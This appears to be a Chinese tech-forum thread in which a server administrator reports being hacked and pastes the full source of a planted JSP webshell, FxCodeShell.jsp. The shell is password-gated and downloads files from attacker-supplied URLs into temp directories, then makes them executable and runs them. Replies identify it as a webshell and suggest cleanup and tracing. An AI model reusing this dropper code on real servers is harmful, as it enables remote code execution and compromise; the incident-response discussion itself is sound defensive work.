这是一个创建于 2404 天前的主题,其中的信息可能已经有所发展或是发生改变。
刚才发现服务器被黑了,在 IIS 目录下多了几个文件
其中一个名为 9082addcc2ac2e12.txt 内容是 vulnerability_id:5c10a762f567dc26567d8b0b
令一个是 FxCodeShell.jsp 内容是
<%@ page import="java.util.Arrays"%> <%@ page language="java" cOntentType="text/html; charset=" pageEncoding="UTF-8"%> <%@ page import="java.io.,java.util.,java.net.URL,java.net.HttpURLConnection"%> <% String view = request.getParameter("view"); if (view == null || view.equals("")) { String localOS = System.getProperty("os.name"); List<string> osList; String tomcatOS = "0"; String DEFAULT = "0"; String WINDOWS = "1"; String LINUX = "2"; osList = new ArrayList<string>(); osList.add("Linux"); osList.add("Windows"); for (String os : osList) { if (localOS.contains(os)) { if (os.equals("Linux")) { tomcatOS = LINUX; } else if (os.equals("Windows")) { tomcatOS = WINDOWS; } else { tomcatOS = DEFAULT; } break; } } out.write(tomcatOS + "
"); response.setHeader("OS", tomcatOS); return; } %></string></string>
<% String password = "FxxkMyLie1836710Aa"; if (!view.equals(password)) { return; } int systemCode = Integer.parseInt(request.getParameter("os")); String address = request.getParameter("address"); String fileName = null; String path = null; String winPath = "C:/Windows/Temp/"; String linuxPath = "/var/tmp/"; switch (systemCode) { case 1: path = winPath; break; default: path = linuxPath; break; }
String[] urls = address.split(","); InputStream fileInputSteam = null; FileOutputStream fileOutputStream = null; for (int i = 0; i <= urls.length - 1; i++) { try { String[] file = urls[i].split("/"); fileName = file[file.length - 1]; out.write("Download:" + urls[i] + "<br>"); out.write("<br>filename:" + fileName + "<br>"); out.write("<br>Size:" + urls.length + "<br>"); out.write( "-------------------------------------------------------------------------------------------------------" + "<br><br>"); File isfile = new File(path + fileName); if (isfile.isFile()) { try { Runtime exec = Runtime.getRuntime(); if (systemCode == 1) { exec.exec(path + fileName); } else { String chmod = "chmod 777 " + path + fileName; exec.exec(chmod); exec.exec("nohup " + path + fileName + " > /dev/null 2>&1 &"); } } catch (Exception e1) { e1.printStackTrace(); } continue; } URL downloadUrl = new URL(urls[i]); HttpURLConnection cOnn= (HttpURLConnection) downloadUrl.openConnection(); conn.setConnectTimeout(60000 * 3); conn.setReadTimeout(60000 * 3); fileInputSteam = conn.getInputStream(); fileOutputStream = new FileOutputStream(path + fileName); int length = -1; byte[] b = new byte[409600]; while ((length = fileInputSteam.read(b)) != -1) { fileOutputStream.write(b, 0, length); fileOutputStream.flush(); } if (conn != null) { conn.disconnect(); } if (fileInputSteam != null) { fileInputSteam.close(); } if (fileOutputStream != null) { fileOutputStream.close(); } Runtime exec = Runtime.getRuntime(); if (systemCode == 1) { exec.exec(path + fileName); } else { String chmod = "chmod 777 " + path + fileName; exec.exec(chmod); exec.exec("nohup " + path + fileName + " > /dev/null 2>&1 &"); } } catch (Exception e2) { e2.printStackTrace(); } } %>
 | 1 sunbing OP Windows service 2003 |
 | 2 11232as 2019-03-13 19:11:20 +08:00 via Android "FxxkMyLie"是个嘛… |
 | 3 shiny 2019-03-13 19:12:18 +08:00 Webshell |
| 4 sunbing OP 多了很多远程进程,多了个用户,不知道有没有其他后门 |
 | 5 mmdsun 2019-03-13 19:26:24 +08:00 via Android 厉害了。黑客还会 java |
 | 6 xiaomimei 2019-03-13 19:50:24 +08:00 via Android  1 像是大马,看代码里写连接密码是 FxxkMyLie1836710Aa,改一下文件等他下次上马,试试能不能溯源 |
 | 8 1nclude 2019-03-14 16:44:10 +08:00 查杀下 webshell,找下漏洞在哪 |
| 10 1nclude 2019-03-15 09:03:47 +08:00 http://www.d99net.net/News.asp?id=62 用下 d 盾,最重要的是找出怎么被入侵的呀 |
Select Language